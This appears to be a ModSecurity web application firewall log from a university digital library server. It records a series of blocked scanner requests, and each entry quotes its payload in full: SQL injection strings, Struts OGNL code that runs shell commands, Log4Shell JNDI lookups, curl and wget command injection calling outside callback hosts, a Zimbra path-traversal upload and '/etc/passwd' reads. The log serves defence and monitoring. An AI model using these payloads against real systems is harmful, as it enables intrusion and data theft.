[Tue Aug 29 11:33:52.308052 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAARQ4DQAAAAB"]
[Tue Aug 29 11:33:52.511778 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "digilib.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAAR@KJgAAAAF"]
[Tue Aug 29 11:33:53.292496 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlg649cwwmk8yezi.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAARQ4EIAAAAB"]
[Tue Aug 29 11:33:53.319723 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlghgaw6n316mief.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAASFeekAAAAG"]
[Tue Aug 29 11:33:53.388997 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "digilib.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAAQKOqYAAAAs"]
[Tue Aug 29 11:33:54.383449 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAASAHe8AAAAH"]
[Tue Aug 29 11:33:54.402878 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "digilib.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAASAHfAAAAAH"]
[Tue Aug 29 11:33:55.322969 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "digilib.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAARdiOAAAAAK"]
[Tue Aug 29 11:33:55.367043 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAARQ4E4AAAAB"]
[Tue Aug 29 11:33:57.486549 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgzmsnzf55b1nu5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAASHh4UAAAAD"]
[Tue Aug 29 11:33:57.676626 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "digilib.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAARy-3wAAAAb"]
[Tue Aug 29 11:33:58.067867 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAARxOtQAAAAa"]
[Tue Aug 29 11:33:59.104509 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASQp@8AAAAT"]
[Tue Aug 29 11:33:59.339048 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAAST4-AAAAAZ"]
[Tue Aug 29 11:34:00.351317 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASK4dYAAAAI"]
[Tue Aug 29 11:34:01.420210 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAASK4d4AAAAI"]
[Tue Aug 29 11:34:03.354256 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgkge9judpm1ms7.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAARdiOgAAAAK"]
[Tue Aug 29 11:34:04.416065 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlg74d4rc1jygwrm.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAARdiO4AAAAK"]
[Tue Aug 29 11:34:06.391723 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAASUX0QAAAAd"]
[Tue Aug 29 11:34:07.295039 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAARQ4FwAAAAB"]
[Tue Aug 29 11:34:07.321507 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAASI0AUAAAAG"]
[Tue Aug 29 11:34:08.319330 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAAST4-8AAAAZ"]
[Tue Aug 29 11:34:08.328121 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASQp-4AAAAT"]
[Tue Aug 29 11:34:08.370390 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAST5AEAAAAZ"]
[Tue Aug 29 11:34:09.305503 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAASMgf0AAAAO"]
[Tue Aug 29 11:34:10.305027 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAASfNugAAAAg"]
[Tue Aug 29 11:34:10.344144 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgeqgsguw3f6nai.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAAPLwF8AAAAX"]
